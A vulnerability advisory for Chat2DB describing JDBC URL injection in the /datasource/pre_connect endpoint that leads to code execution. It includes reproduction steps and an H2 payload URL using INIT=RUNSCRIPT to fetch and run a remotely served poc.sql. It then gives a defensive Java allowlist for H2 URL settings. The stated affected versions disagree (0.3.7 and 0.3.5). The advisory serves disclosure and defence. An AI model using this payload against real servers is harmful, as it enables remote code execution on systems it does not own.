ABUG_Author: jmx0hxq
Affected version: <=0.3.7
Vendor: CodePhiliaX
Software: Chat2DB
https://github.com/CodePhiliaX/Chat2DB/
Vulnerability File: ai/chat2db/server/web/api/controller/data/source/DataSourceController.java
ai/chat2db/server/domain/core/impl/DataSourceServiceImpl.java
ai/chat2db/spi/util/JdbcUtils.java
Description: Chat2DB is an intelligent, universal SQL client and data reporting tool that integrates AI capabilities.
Chat2DB versions ≤ v0.3.5 have a security vulnerability. The /datasource/pre_connect interface does not check or restrict the URL entered by the user, allowing attackers to execute arbitrary code by providing a carefully crafted URL.
After setting up the environment, visit http://localhost:8000/connections and choose to create a new H2 database connection.
Select local file as the service type, then build the URL through a crafted File parameter.
The final URL:
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '<http://127.0.0.1:8001/poc.sql>'
A poc.sql file is served on local port 8001.
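The missing check on the user-supplied URL can be illustrated with a settings allowlist applied before the URL reaches the JDBC driver. This is an added example, not code from Chat2DB or its fix; the class `H2UrlCheck`, the method `rejectReason`, the allowlist contents and the sample URLs are assumptions made for illustration.

```java
import java.util.List;
import java.util.Locale;
import java.util.Set;

public class H2UrlCheck {
    // Assumed allowlist for this example; anything not listed (INIT,
    // TRACE_LEVEL_SYSTEM_OUT, ...) is refused rather than blocklisted.
    private static final Set<String> ALLOWED_SETTINGS =
            Set.of("MODE", "DB_CLOSE_DELAY", "IFEXISTS", "ACCESS_MODE_DATA");

    /** Returns null if the URL is acceptable, otherwise the reason for rejection. */
    static String rejectReason(String url) {
        if (url == null) return "missing URL";
        String u = url.trim();
        if (!u.regionMatches(true, 0, "jdbc:h2:", 0, 8)) return "not an H2 URL";
        // parts[0] is the database name/path; the rest are ;KEY=VALUE settings.
        String[] parts = u.substring(8).split(";", -1);
        for (int i = 1; i < parts.length; i++) {
            String p = parts[i].trim();
            if (p.isEmpty()) continue;
            int eq = p.indexOf('=');
            if (eq <= 0) return "malformed setting: " + p;
            // H2 setting names are case-insensitive, so normalise before comparing.
            String key = p.substring(0, eq).trim().toUpperCase(Locale.ROOT);
            if (!ALLOWED_SETTINGS.contains(key)) return "setting not allowed: " + key;
        }
        return null;
    }

    public static void main(String[] args) {
        // Constructed sample inputs.
        List<String> samples = List.of(
            "jdbc:h2:mem:testdb;MODE=MySQL",
            "jdbc:h2:mem:testdb;MODE=MySQL;INIT=RUNSCRIPT FROM 'http://example.invalid/setup.sql'",
            "jdbc:h2:mem:testdb;init=RUNSCRIPT FROM 'setup.sql'");
        for (String s : samples) {
            String reason = rejectReason(s);
            System.out.println((reason == null ? "ALLOW  " : "REJECT ") + s
                    + (reason == null ? "" : "  [" + reason + "]"));
        }
    }
}
```

The check covers only the `;KEY=VALUE` settings; the database name or file path in the first segment needs its own validation.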